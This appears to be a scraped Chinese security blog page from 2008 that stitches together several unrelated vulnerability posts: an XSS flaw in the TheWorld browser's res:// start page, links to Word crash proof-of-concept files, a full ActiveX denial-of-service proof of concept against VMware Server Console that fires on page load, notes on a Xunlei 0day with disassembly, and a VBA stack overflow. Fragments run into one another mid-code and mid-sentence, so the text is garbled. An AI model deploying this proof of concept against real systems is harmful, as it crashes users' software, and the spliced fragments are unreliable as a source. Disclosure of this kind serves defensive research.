漏洞说明:http://www.80sec.com/360-sec-browser-localzone-xss.html
文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt
漏洞分析:世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll /TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏 洞,简单分析如下:
<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i ++ )
{
str_url = g_arr_argUrlOld[i];
str_name = g_arr_argNameOld[i];来源:Sowhat的blog
Microsoft Word Bulleted List Handling Remote Memory Corruption Vulnerability
http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-1.doc
http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-2.doc
http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-3.doc
http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-4.doc
或者统一打包 http://packetstormsecurity.org/0806-exploits/msword-crash.tgz
Tags: Office Word, POC<html>
<title>VMware Server Console ActiveX DOS POC</title>
<!--
Author:Shennan Wang
blog:http://hi.baidu.com/nansec
stuff:http://www.d4rkn3t.cn
thanks:
Robinh00d,ayarei,void
-->
<head>
<script language="JavaScript">
function test() {
var bufA = "2";
var bufB = "0";
var bufC = "0";
var bufD = "8";
for (i = 0; i < 2008; i++) {
bufA += bufA;}
for (i = 0; i < 2008; i++){
bufB += bufB;}
for (i = 0; i < 2008; i++){
bufC += bufC;}
for (i = 0; i < 2008; i++){
bufD += bufD;}
nansec.DoModalDirect(bufA,bufB,bufC,bufD);}
</script>
</head>
<body onload="JavaScript: return test();">
<object classid="clsid:D2C53A29-B43A-4367-B808-52CE785BBF36" id="nansec">
</object>
</body>
</html>
# milw0rm.com [2008-05-28]作者:疯狗
以前一直在传迅雷还有0day,Activex的应该差不多了,但是也不敢怠慢,还是卸载之,今天丰初发来一URL,原来素一迅雷0day,看说明还是远程!感觉装了一个,看那个漏洞监听的端口
C:\>netstat -na|find "36897"
TCP 127.0.0.1:36897 0.0.0.0:0 LISTENING
绑定的本地IP啊?!那就说明这个是不可以远程的,只能本地了。
......
23132CBE 68 B4C61323 push 2313C6B4 ; ASCII "savepath"
23132CC3 57 push edi
23132CC4 FFD6 call esi
23132CC6 59 pop ecx
23132CC7 84C0 test al, al
Stack overflow in vbe6.dll, (used by all versions of MS Office)
The overflow occurs in Visual Basic for Application.
Creating a property with a long name ( about 247 chars) results in a stack overflow in vbe6.dll which overwrites with a null byte the first byte of the return address.
Probably impossible to exploit, but who knows? ^^ At least, 阅读全文 »
Tags: Exploit, POC, Visual Basic